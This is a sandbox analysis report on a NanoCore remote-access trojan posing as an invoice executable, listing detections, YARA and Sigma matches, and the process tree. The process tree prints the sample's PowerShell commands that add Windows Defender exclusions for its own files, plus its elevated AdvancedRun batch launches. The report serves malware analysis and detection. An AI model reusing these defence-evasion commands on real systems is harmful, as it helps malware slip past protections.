Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287994.exe

Overview

General Information

Sample Name:CN-Invoice-XXXXX9808-19011143287994.exe
Analysis ID:358392
MD5:a0f103f98ede4da72e178ee05dabe1e1
SHA1:320dea63289cad5685cfba395d673142f85fc6ff
SHA256:6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
Tags:NanoCore
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287994.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
    • powershell.exe (PID: 1472 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5008 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 4824 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 3400 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5856 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 816 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 6252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 4792 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4424 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4184 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 6776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6980 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6336 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 5588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5604 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5820 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • svchost.exe (PID: 6176 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 6224 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6292 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6408 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 4732 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6264 cmdline: 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfcf5:$a: NanoCore
      • 0xfd05:$a: NanoCore
      • 0xff39:$a: NanoCore
      • 0xff4d:$a: NanoCore
      • 0xff8d:$a: NanoCore
      • 0xfd54:$b: ClientPlugin
      • 0xff56:$b: ClientPlugin
      • 0xff96:$b: ClientPlugin
      • 0xfe7b:$c: ProjectData
      • 0x10882:$d: DESCrypto
      • 0x1824e:$e: KeepAlive
      • 0x1623c:$g: LogClientMessage
      • 0x12437:$i: get_Connected
      • 0x10bb8:$j: #=q
      • 0x10be8:$j: #=q
      • 0x10c04:$j: #=q
      • 0x10c34:$j: #=q
      • 0x10c50:$j: #=q
      • 0x10c6c:$j: #=q
      • 0x10c9c:$j: #=q
      • 0x10cb8:$j: #=q
      00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1045d:$x1: NanoCore.ClientPluginHost
      • 0x4327d:$x1: NanoCore.ClientPluginHost
      • 0x75e9d:$x1: NanoCore.ClientPluginHost
      • 0x1049a:$x2: IClientNetworkHost
      • 0x432ba:$x2: IClientNetworkHost
      • 0x75eda:$x2: IClientNetworkHost
      • 0x13fcd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      • 0x46ded:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      • 0x79a0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.CasPol.exe.3b3ff84.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xf7ad:$x1: NanoCore.ClientPluginHost
      • 0x28279:$x1: NanoCore.ClientPluginHost
      • 0xf7da:$x2: IClientNetworkHost
      • 0x282a6:$x2: IClientNetworkHost
      13.2.CasPol.exe.3b3ff84.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xf7ad:$x2: NanoCore.ClientPluginHost
      • 0x28279:$x2: NanoCore.ClientPluginHost
      • 0x10888:$s4: PipeCreated
      • 0x29354:$s4: PipeCreated
      • 0xf7c7:$s5: IClientLoggingHost
      • 0x28293:$s5: IClientLoggingHost
      13.2.CasPol.exe.3b3ff84.2.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe38d:$x1: NanoCore.ClientPluginHost
        • 0xe3ca:$x2: IClientNetworkHost
        • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xe105:$x1: NanoCore Client.exe
        • 0xe38d:$x2: NanoCore.ClientPluginHost
        • 0xf9c6:$s1: PluginCommand
        • 0xf9ba:$s2: FileCommand
        • 0x1086b:$s3: PipeExists
        • 0x16622:$s4: PipeCreated
        • 0xe3b7:$s5: IClientLoggingHost
        Click to see the 65 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 4228, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Suspicious Svchost ProcessShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
        Sigma detected: System File Execution Location AnomalyShow sources
        Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for domain / URLShow sources
        Source: coroloboxorozor.comVirustotal: Detection: 15%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeReversingLabs: Detection: 27%
        Multi AV Scanner detection for submitted fileShow sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exeVirustotal: Detection: 29%Perma Link
        Source: CN-Invoice-XXXXX9808-19011143287994.exeReversingLabs: Detection: 27%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exeJoe Sandbox ML: detected
        Source: 13.2.CasPol.exe.51c0000.7.unpackAvira: Label: TR/NanoCore.fadte

        Compliance:

        barindex
        Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: shcore.pdb= source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: .pdb>X source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbR source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdbe source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdbx source: WerFault.exe, 00000011.00000003.772085355.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$ source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb{ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbN source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdbq source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb, source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: rasapi32.pdbe source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdbc source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbS source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb3 source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
